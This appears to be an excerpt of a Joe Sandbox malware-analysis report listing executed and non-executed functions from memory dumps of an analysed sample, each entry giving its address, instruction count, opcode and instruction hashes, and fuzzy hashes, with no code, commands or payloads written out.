                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57621f3f93461b8050f0c0bee17fc043efe45d784c8f90d27294e668ebb2f5dc
                            • Instruction ID: 86e3df5320f3b4bd7d42e4b9215e2ac61c29baf8748b631df713e59f8790a0bf
                            • Opcode Fuzzy Hash: 57621f3f93461b8050f0c0bee17fc043efe45d784c8f90d27294e668ebb2f5dc
                            • Instruction Fuzzy Hash: 53D0C931D4940CAEDB80EB98E8415ECB774EF84210F0011B7D40DE31A2DF312A518640
                            Function 00007FF848F48577 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8b4ac76ee2446f5f16fe4edcb6a8cf46a1dd9852618a7addd1fddbc83b0709b
                            • Instruction ID: 45802e220ff23a71d26a4ea7efadfad050f809efe7ffe8d4edfd95f260ee2163
                            • Opcode Fuzzy Hash: a8b4ac76ee2446f5f16fe4edcb6a8cf46a1dd9852618a7addd1fddbc83b0709b
                            • Instruction Fuzzy Hash: 1ED0C93041E01A8ED610BB58C8055EAB330FF56760F2013A6892A2B1E69B3A2516DB80

                            Non-executed Functions

                            Function 00007FF848F4388C Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ba5fe9299847742101e48a44d87c566d73e3810ae61a9f73787cfc6e476fb81
                            • Instruction ID: 9dd2ab091e687f8f6914f8f1b5e30613699b68bc2cbc32a261a94dda000f5171
                            • Opcode Fuzzy Hash: 7ba5fe9299847742101e48a44d87c566d73e3810ae61a9f73787cfc6e476fb81
                            • Instruction Fuzzy Hash: F5D01731E0452C8ECF44EE88E881AFDF3B0FB95310F001566D10DF3141CB70A9108B84

                            Executed Functions

                            Function 00007FF848F37089 Relevance: 1.0, Instructions: 952COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 139d0775fa468f21cc7156919c5dd9c950e39bb944edcb1db6ac03ab606cdd4d
                            • Instruction ID: 9af884102a21ae16724f800053b89e9162cfaf3f2cbc397c32b2bdaca0bd438b
                            • Opcode Fuzzy Hash: 139d0775fa468f21cc7156919c5dd9c950e39bb944edcb1db6ac03ab606cdd4d
                            • Instruction Fuzzy Hash: 5F82D770D1992D8FDBA8EB18C895BA9B7B1FF58341F5041EAD00DE3291CB35AA81CF54
                            Function 00007FF848F38AFE Relevance: .4, Instructions: 409COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3475bb33e33fcb16e3c57a53d33c34aa79debe974ab0e644680f6f1c9b219afd
                            • Instruction ID: ebc15bdabd68a636c516886a1e61a60a7daf426dbb8c6f5f6b23ba1ac41ad846
                            • Opcode Fuzzy Hash: 3475bb33e33fcb16e3c57a53d33c34aa79debe974ab0e644680f6f1c9b219afd
                            • Instruction Fuzzy Hash: D8E1F430D1962D9FDB94EB68C895BADB7B1FF59301F5041AAD00DE3292CB38A985CF50
                            Function 00007FF848F39ED2 Relevance: .4, Instructions: 393COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c19dd26e5814a9393d8b7db3e30a2c303aee99719eab6a889c4594ca367ddc0a
                            • Instruction ID: 9ae3cf217e0ab37a3d9cfc32d0bf1d73134776f15fbd537ef126bf566b7ad84c
                            • Opcode Fuzzy Hash: c19dd26e5814a9393d8b7db3e30a2c303aee99719eab6a889c4594ca367ddc0a
                            • Instruction Fuzzy Hash: 8AE1C330D19A1D8FDB94EB68C895BADB7B1FF59301F5041AAD00DE3292DB38A985CB50
                            Function 00007FF848F37D92 Relevance: .4, Instructions: 392COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df1d6163bcc3be014f31b920938b4bea7e9b13044858c1f2b43ba1ec717a47aa
                            • Instruction ID: 2369b2ffd263de842efa6a7527dbc02d7de7922d857d10ea2f78a58a047fe862
                            • Opcode Fuzzy Hash: df1d6163bcc3be014f31b920938b4bea7e9b13044858c1f2b43ba1ec717a47aa
                            • Instruction Fuzzy Hash: 2CE1D670919A1D8FDB95EB28C894BE9B7B1FF59301F5041EAD00DE3291CB39AA81CF14
                            Function 00007FF848F3A46C Relevance: .2, Instructions: 243COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d52fc54b1aa77b22cef047ed2ea9f620c9b1cc2d25d3de57a57bb881e1159cfd
                            • Instruction ID: 35b6b9c0c1c03e0bd40de6ca9d5a239ea0465ab571b06f691e41e04a14d2c2fd
                            • Opcode Fuzzy Hash: d52fc54b1aa77b22cef047ed2ea9f620c9b1cc2d25d3de57a57bb881e1159cfd
                            • Instruction Fuzzy Hash: EE912670D09A1A8FEB94EF68C458BEDB7B1FF58300F1042A9D41DE7296CB389985CB54
                            Function 00007FF848F3A6FC Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3202c225cc5c9c831e55dc5a560a8849ab46febae47a937e402aef5626f72081
                            • Instruction ID: 364a23256746701035acda4a9eea01e55bff2b1a7c3233ff304296073d06f628
                            • Opcode Fuzzy Hash: 3202c225cc5c9c831e55dc5a560a8849ab46febae47a937e402aef5626f72081
                            • Instruction Fuzzy Hash: C9012831C1861A8EEB50EFA5C4447FEB2B1EF85340F00813AC119A72D5CB796589CF84
                            Function 00007FF848F308D3 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;M_^$K;M
                            • API String ID: 0-263230361
                            • Opcode ID: a849b62b672e60f300b13f0ba16346838866082f5427582a6b04abb10190eec8
                            • Instruction ID: 5d72b567abdea925b9eaeb4185263afa61e51b63e4317f0461aeb65b45ddc6f3
                            • Opcode Fuzzy Hash: a849b62b672e60f300b13f0ba16346838866082f5427582a6b04abb10190eec8
                            • Instruction Fuzzy Hash: 38A11631A0992C8FDB94EB6CD884AEDB7B1FF99351F0442AAD04DD7252CB34A885CB40
                            Function 00007FF848F3B8A9 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: $&
                            • API String ID: 0-3840539561
                            • Opcode ID: 745e2de48f9e5d5de8eb737baa991e61aad3603467155361b0eca51af0df1a18
                            • Instruction ID: 1725a5a790ed21c899885410ed31f6101df23ff4eb542a91088b067b19c8f981
                            • Opcode Fuzzy Hash: 745e2de48f9e5d5de8eb737baa991e61aad3603467155361b0eca51af0df1a18
                            • Instruction Fuzzy Hash: 06C18A30D19A1E8FDB54FB54C858AEAB7B1FF08341F1446BAC00E97285DB38A985CF94
                            Function 00007FF848F308D8 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;M_^$K;M
                            • API String ID: 0-263230361
                            • Opcode ID: 61970f4eb6d270519711ff9e8c4fc001f3ad64ce50e6dbb117ee29ff88da5341
                            • Instruction ID: d3ae97ac65ad4c8e68be8c6c1e2f4853166b2dd85e88c6146da5d6ee27fa7d3a
                            • Opcode Fuzzy Hash: 61970f4eb6d270519711ff9e8c4fc001f3ad64ce50e6dbb117ee29ff88da5341
                            • Instruction Fuzzy Hash: E1A10731A0992C8FDB94EB6CD895BEDB7B1FF99351F0442AAD04DD7252CB34A885CB40
                            Function 00007FF848F308E8 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;M_^$K;M
                            • API String ID: 0-263230361
                            • Opcode ID: 57b9e5f3f4d869ede51b7e033f2146c85908f4547e96d5f98fb4e3a354a79043
                            • Instruction ID: fac7f3802ec14acd270e66662dc365a519ef87f17e556982d2ee79efd72d82f9
                            • Opcode Fuzzy Hash: 57b9e5f3f4d869ede51b7e033f2146c85908f4547e96d5f98fb4e3a354a79043
                            • Instruction Fuzzy Hash: FDA1F631A0992C9FDB94EB6CD885AEDB7B1FF99351F0442AAD00DD7252CB34A885CB44
                            Function 00007FF848F308F8 Relevance: 2.8, Strings: 2, Instructions: 302COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;M_^$K;M
                            • API String ID: 0-263230361
                            • Opcode ID: 806fd197d6b3ff01b9914997eaf5693000ed7f26451d94d642136c3d3490fb60
                            • Instruction ID: 740f5ca53d7f190acabcd413445d2461ad091bc28b4be38186ef71f55f1335c0
                            • Opcode Fuzzy Hash: 806fd197d6b3ff01b9914997eaf5693000ed7f26451d94d642136c3d3490fb60
                            • Instruction Fuzzy Hash: D9A1F671A0992C9FDB94EB6CD885BEDB7B1FF99351F0442AAD00DD7252CB34A885CB40
                            Function 00007FF848F308B8 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: K;M
                            • API String ID: 0-1666167106
                            • Opcode ID: 666de3d626695a16408bc653a9e34f75fc0df680855e45cde2e1bf5cbbfea6aa
                            • Instruction ID: 9a027c68d8266c348f0e7a0ce13e6353c4fd6d98b55f45f69b1b213d6b4cd477
                            • Opcode Fuzzy Hash: 666de3d626695a16408bc653a9e34f75fc0df680855e45cde2e1bf5cbbfea6aa
                            • Instruction Fuzzy Hash: B9A1F731A0992C9FDB94EB6CD885BEDB7B1FF99351F1442AAD00DD7252CB34A885CB40
                            Function 00007FF848F308C8 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: K;M
                            • API String ID: 0-1666167106
                            • Opcode ID: 12739f57360f43d711c0ca5ee5b271c9a4fa48bbecd2ba6e26a1d0223a85a548
                            • Instruction ID: 03d92836dc5ec8b1db0c20039cbcee33017de8f62dae850e5d478152a026e006
                            • Opcode Fuzzy Hash: 12739f57360f43d711c0ca5ee5b271c9a4fa48bbecd2ba6e26a1d0223a85a548
                            • Instruction Fuzzy Hash: 7DA1F831A0992C9FDB94EB68D885BEDB7B1FF99351F0441AAD00DE7252CB34A885CB40
                            Function 00007FF848F30908 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: K;M
                            • API String ID: 0-1666167106
                            • Opcode ID: 5419a4091dde96914d9f21f246572a73ac674eda423edfb97f289c32b44f5a34
                            • Instruction ID: ea8fa779c3f29b567e36cb3eb737223aea6d44cf978b41a08bb17404e8f9575a
                            • Opcode Fuzzy Hash: 5419a4091dde96914d9f21f246572a73ac674eda423edfb97f289c32b44f5a34
                            • Instruction Fuzzy Hash: 19A1E671A0992C9FDB94EB68D885BEDB7B1FF99351F0441AAD00DE7252CB34A885CB40
                            Function 00007FF848F35AF0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: L_^
                            • API String ID: 0-3811526842
                            • Opcode ID: b47774821064bb9edf53681dffc38f181280e7066aad8c4b434c928eee0a7541
                            • Instruction ID: c1aeac6deb38f5471a078d02ea5a72d8fc1725620b2e9b86a99971c8aa522db6
                            • Opcode Fuzzy Hash: b47774821064bb9edf53681dffc38f181280e7066aad8c4b434c928eee0a7541
                            • Instruction Fuzzy Hash: E9510C319BF24B5EE991B36814EA4FF2580EF8A3A1F853DB3E84D561C39F0831146258
                            Function 00007FF848F35AF7 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: L_^
                            • API String ID: 0-3811526842
                            • Opcode ID: 9df9e3ad37bb7e155422e3e0ae81eb2fea6d3974a2232417ad03609bfb51a40a
                            • Instruction ID: 9176f85b5b721332ef908bfd55b89e9eb933f56eea5fa89a5277e2f6372aa158
                            • Opcode Fuzzy Hash: 9df9e3ad37bb7e155422e3e0ae81eb2fea6d3974a2232417ad03609bfb51a40a
                            • Instruction Fuzzy Hash: 7951FC319BF24B5EEA91B36814EA4FF2580EF8A3A1F853DB3E84D561C39F0831146259
                            Function 00007FF848F30C80 Relevance: .6, Instructions: 574COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 549230bd4cc04e1c23f7e54ee004785878faedc484f61c14261ab266276bed6a
                            • Instruction ID: 7c85d59fb66d218a95deb5c661b99f8194c5888f84159388f290a6e8e53c618c
                            • Opcode Fuzzy Hash: 549230bd4cc04e1c23f7e54ee004785878faedc484f61c14261ab266276bed6a
                            • Instruction Fuzzy Hash: AF32D63091992D8FDB94FB28C899BA9B7B1FB98340F5441AAD40DD3295DF396D82CF40
                            Function 00007FF848F3EFF5 Relevance: .5, Instructions: 463COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be1299e76b3c7f17d51c7b4f40d4b196f6c1782ef826accff10860e73d7c4131
                            • Instruction ID: dc853ab2b4b1c27890d17a86f131985b9fb534ee306f12de03c4b3bfecf54af7
                            • Opcode Fuzzy Hash: be1299e76b3c7f17d51c7b4f40d4b196f6c1782ef826accff10860e73d7c4131
                            • Instruction Fuzzy Hash: B0024830D0961D8FDB58EF68C494BEDB7B1FF58344F2041AAD40EA7296CB39A881CB54
                            Function 00007FF848F36BF3 Relevance: .4, Instructions: 442COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8842f11480b6c32571c5777e144a6ea7a0c8038782febe3afe734419fdcf8a21
                            • Instruction ID: 8cf0ba9e6cabe9b8701500e59b27767c02faf63a281eef5ecd4352b45656b52b
                            • Opcode Fuzzy Hash: 8842f11480b6c32571c5777e144a6ea7a0c8038782febe3afe734419fdcf8a21
                            • Instruction Fuzzy Hash: AED10432E0EA898FE755AB6CA8153BC7BE1FF51790F1401BAC048971CAEF3D59058B85
                            Function 00007FF848F33A3D Relevance: .3, Instructions: 346COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e05fee45077269ef67de4328484fc90636f3648d1ad949dd2b2693128539cb3a
                            • Instruction ID: aa1b8a00691e9e1b7aeb2a8c9d85ecc8eb9a2e0070a425f04762476903735cf0
                            • Opcode Fuzzy Hash: e05fee45077269ef67de4328484fc90636f3648d1ad949dd2b2693128539cb3a
                            • Instruction Fuzzy Hash: 3FC13930D0CA5D8FEB94EB68D895BA9BBF1FF59341F1400AAD00DE7292CB356885CB04
                            Function 00007FF848F3327D Relevance: .3, Instructions: 309COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e4d760df19eae420eb49d1837529fb415a61bcc7b048f938a8834c7cc633d9a6
                            • Instruction ID: 09974e29d506613d127fe700e9fdd333360c3479cf22382351d848fde0096695
                            • Opcode Fuzzy Hash: e4d760df19eae420eb49d1837529fb415a61bcc7b048f938a8834c7cc633d9a6
                            • Instruction Fuzzy Hash: 96B13C70D08A5D8FEB94EB6CD495BA8BBF1FF69341F1440AAD00DE3291CB35A881CB11
                            Function 00007FF848F34E26 Relevance: .3, Instructions: 308COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d3b508d17943facaf4735a46f740437c4906bbe139591b5ca712d71fb3461cd
                            • Instruction ID: 1d2cd7c0e92d50d7dbbb5dd25c607c5e48537dd02571c24e6ebd353e1e0669fa
                            • Opcode Fuzzy Hash: 1d3b508d17943facaf4735a46f740437c4906bbe139591b5ca712d71fb3461cd
                            • Instruction Fuzzy Hash: 1AB12E70D08A5D8FDB95EB68C894BA8BBF1FF69301F1441AAD00DE7291DB35A985CB01
                            Function 00007FF848F34646 Relevance: .3, Instructions: 304COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40f3b687c76f81670b564c42223181a55d1cab7291d2f8be39b59f3bc481f9ea
                            • Instruction ID: 4882754a715cde1794305ca25e4258368c06c9daf87015fa182be643c4a73fa7
                            • Opcode Fuzzy Hash: 40f3b687c76f81670b564c42223181a55d1cab7291d2f8be39b59f3bc481f9ea
                            • Instruction Fuzzy Hash: A6B10E70D09A5D8FDB94EF68C854BA8BBF1FF69300F1441AAD00DE7292DB359985CB11
                            Function 00007FF848F34A36 Relevance: .3, Instructions: 303COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a75fc92c8a43d408fa9b92bdd97ef1e3a976f8ed0b62f755a4d50cd6c1643a20
                            • Instruction ID: 90e0b8347806907cd112b24649a45ab3f1a65c889fee14cd03911ebb8bd922df
                            • Opcode Fuzzy Hash: a75fc92c8a43d408fa9b92bdd97ef1e3a976f8ed0b62f755a4d50cd6c1643a20
                            • Instruction Fuzzy Hash: 44B12C70D08A5D8FDB94EF68C894BA8BBF1FF69340F1441AAD00DE7292CB359985CB05
                            Function 00007FF848F3523A Relevance: .3, Instructions: 285COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 667b2d8b9c6c8b9adc6d3a00a1a6d19bac2f94acb09ca138ef965850f229bff1
                            • Instruction ID: 2457f961d53c47946a3925c30c1f8c8e229c92269a012b1d22e16c2fbf114d70
                            • Opcode Fuzzy Hash: 667b2d8b9c6c8b9adc6d3a00a1a6d19bac2f94acb09ca138ef965850f229bff1
                            • Instruction Fuzzy Hash: 70A10C70D08A5D8FDB94EB58C895BA8BBF1FF69301F5040AAD00DE7291DB35A985CB11
                            Function 00007FF848F33E66 Relevance: .3, Instructions: 285COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6cf4c5308bdc543e65b28e97007443c9208f499a950ce80448547c2f3e2439dd
                            • Instruction ID: d21320f9e1c3018dabbd9cdee8187b34a518c49f7ed7daf43a8c9e0dcf49adc8
                            • Opcode Fuzzy Hash: 6cf4c5308bdc543e65b28e97007443c9208f499a950ce80448547c2f3e2439dd
                            • Instruction Fuzzy Hash: 9AA13D70D0CA5D8FDB95EB68C855BA8BBF1FF69300F0441AAD00DE7292CB35A985CB11
                            Function 00007FF848F33A48 Relevance: .3, Instructions: 273COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed49144f73e5a699ca925f5c57ed8be915bc758fb7fa75d83f1675bbeb160b17
                            • Instruction ID: 163bdca4c505bd39f24178dd23c0bda51f326e09bd7bb95d8123c898643da3d2
                            • Opcode Fuzzy Hash: ed49144f73e5a699ca925f5c57ed8be915bc758fb7fa75d83f1675bbeb160b17
                            • Instruction Fuzzy Hash: 99A13A71D0CA5D8FEB94EB68D8957A9BBF1FF59341F0401AAD00DE7292CB356884CB05
                            Function 00007FF848F342D2 Relevance: .2, Instructions: 250COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c84bf2d64e9b2cd4f2e31ae8d38713d54c6f0706b4f817f6668d08b37b8b25e
                            • Instruction ID: de076bc5b2a4548925560f08d31836ae39fea90b357874a0f389268f81585906
                            • Opcode Fuzzy Hash: 2c84bf2d64e9b2cd4f2e31ae8d38713d54c6f0706b4f817f6668d08b37b8b25e
                            • Instruction Fuzzy Hash: D291C570D1891D8FDB98EB58C895BACBBF1FF68301F5041AAD00DE3291DB35A981CB05
                            Function 00007FF848F35606 Relevance: .2, Instructions: 238COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef13d8e88ea4df7337b640bca4d5a53deb74f734ed5d2a935d03efa2ce2da94c
                            • Instruction ID: 320c3e83f824434dd1b80c5db27d1f0efc75f584f006f62525a6fd1a7d2b38e2
                            • Opcode Fuzzy Hash: ef13d8e88ea4df7337b640bca4d5a53deb74f734ed5d2a935d03efa2ce2da94c
                            • Instruction Fuzzy Hash: 4581FB70908A5D9FDF94EF68C895BA8BBF1FF59301F0441AAD00DE7292DB34A985CB41
